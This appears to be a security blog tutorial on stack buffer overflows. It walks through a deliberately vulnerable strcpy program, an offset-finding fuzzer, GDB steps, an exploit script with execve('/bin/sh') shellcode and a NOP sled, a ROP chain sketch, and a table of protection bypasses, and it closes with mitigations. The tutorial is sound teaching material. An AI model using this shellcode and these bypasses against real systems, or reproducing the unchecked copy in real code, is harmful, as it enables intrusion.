index

Introduction to Buffer Overflows

Buffer overflows are one of the most fundamental vulnerabilities in software security. In this post, we’ll explore the basics of stack-based buffer overflows and see how they can be exploited.

What is a Buffer Overflow?

A buffer overflow occurs when a program writes more data to a buffer than it can hold. This can overwrite adjacent memory locations, potentially allowing an attacker to execute arbitrary code.

Vulnerable Code Example

Let’s look at a simple vulnerable C program:

1
#include <stdio.h>
2
#include <string.h>
3

4
void vulnerable_function(char *input) {
5
    char buffer[64];
6
    strcpy(buffer, input);  // Dangerous! No bounds checking
7
    printf("Input: %s\n", buffer);
8
}
9

10
int main(int argc, char *argv[]) {
11
    if (argc != 2) {
12
        printf("Usage: %s <input>\n", argv[0]);
13
        return 1;
14
    }
15

16
    vulnerable_function(argv[1]);
17
    return 0;
18
}

The Problem

The strcpy() function doesn’t check if the source string fits in the destination buffer. If we provide input longer than 64 characters, we’ll overflow the buffer.

Compilation and Testing

First, let’s compile the program with debugging symbols and disable stack protections:

gcc -g -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Compilation flags explained:

-g: Include debugging information
-fno-stack-protector: Disable stack canaries
-z execstack: Make stack executable
-o vulnerable: Output filename

Finding the Offset

To exploit this, we need to find exactly how many bytes it takes to overwrite the return address:

1
#!/usr/bin/env python3
2

3
import struct
4
import subprocess
5

6
def test_overflow(payload_size):
7
    payload = b"A" * payload_size
8
    try:
9
        result = subprocess.run(
10
            ["./vulnerable", payload],
11
            capture_output=True,
12
            timeout=5
13
        )
14
        return result.returncode
15
    except subprocess.TimeoutExpired:
16
        return -1
17

18
# Binary search to find crash point
19
for i in range(60, 80):
20
    ret_code = test_overflow(i)
21
    print(f"Payload size {i}: Return code {ret_code}")
22
    if ret_code != 0:
23
        print(f"Crash detected at {i} bytes!")
24
        break

Using GDB for Analysis

We can use GDB to analyze the crash:

gdb ./vulnerable
(gdb) run $(python3 -c "print('A' * 76)")
(gdb) info registers
(gdb) x/20x $esp
(gdb) bt

Basic Exploitation

Once we know the offset (let’s say it’s 72 bytes), we can craft an exploit:

1
#!/usr/bin/env python3
2

3
import struct
4

5
# Our shellcode (execve("/bin/sh"))
6
shellcode = (
7
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
8
    b"\x53\x89\xe1\xb0\x0b\xcd\x80"
9
)
10

11
# Build the payload
12
buffer_size = 72
13
nop_sled = b"\x90" * (buffer_size - len(shellcode))
14
return_address = struct.pack("<I", 0xbffff7a0)  # Example address
15

16
payload = nop_sled + shellcode + return_address
17

18
print(payload)

Memory Layout Visualization

Here’s what the stack looks like before and after overflow:

1
Normal Stack:
2
+------------------+
3
| Return Address   |  <- We want to control this
4
+------------------+
5
| Saved EBP        |
6
+------------------+
7
| buffer[64]       |  <- Our input goes here
8
+------------------+
9
| Local variables  |
10
+------------------+
11

12
After Overflow:
13
+------------------+
14
| 0x41414141       |  <- Overwritten return address
15
+------------------+
16
| 0x41414141       |  <- Overwritten saved EBP
17
+------------------+
18
| AAAAAAA...       |  <- Our 'A's overflow the buffer
19
+------------------+

Protection Mechanisms

Modern systems have several protections against buffer overflows:

Protection	Description	Bypass Technique
ASLR	Address Space Layout Randomization	Info leaks, brute force
DEP/NX	Data Execution Prevention	ROP/JOP chains
Stack Canaries	Detection values on stack	Canary leaks, format strings
FORTIFY_SOURCE	Enhanced function checks	Use unprotected functions

Advanced Techniques

Return-Oriented Programming (ROP)

When DEP is enabled, we can use ROP gadgets:

1
# Example ROP chain
2
rop_chain = [
3
    0x08048123,  # pop eax; ret
4
    0x0000000b,  # execve syscall number
5
    0x08048456,  # pop ebx; ret
6
    0x08049000,  # address of "/bin/sh"
7
    # ... more gadgets
8
]

Format String Vulnerabilities

Sometimes buffer overflows combine with format string bugs:

1
char buffer[64];
2
strcpy(buffer, user_input);
3
printf(buffer);  // Format string vulnerability!

Mitigation Strategies

For Developers:

Use safe string functions (strncpy, strlcpy)
Enable compiler protections (-fstack-protector-strong)
Perform input validation
Use static analysis tools

For System Administrators:

Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space
Use hardened compilations
Keep systems updated

Conclusion

Buffer overflows remain a critical vulnerability class despite decades of research. Understanding how they work is essential for both offensive and defensive security practitioners.

Remember: Only practice these techniques on systems you own or have explicit permission to test!

References

Happy hacking! 🐱‍💻

Buffer Overflow Basics: Your First Stack Smashing Adventure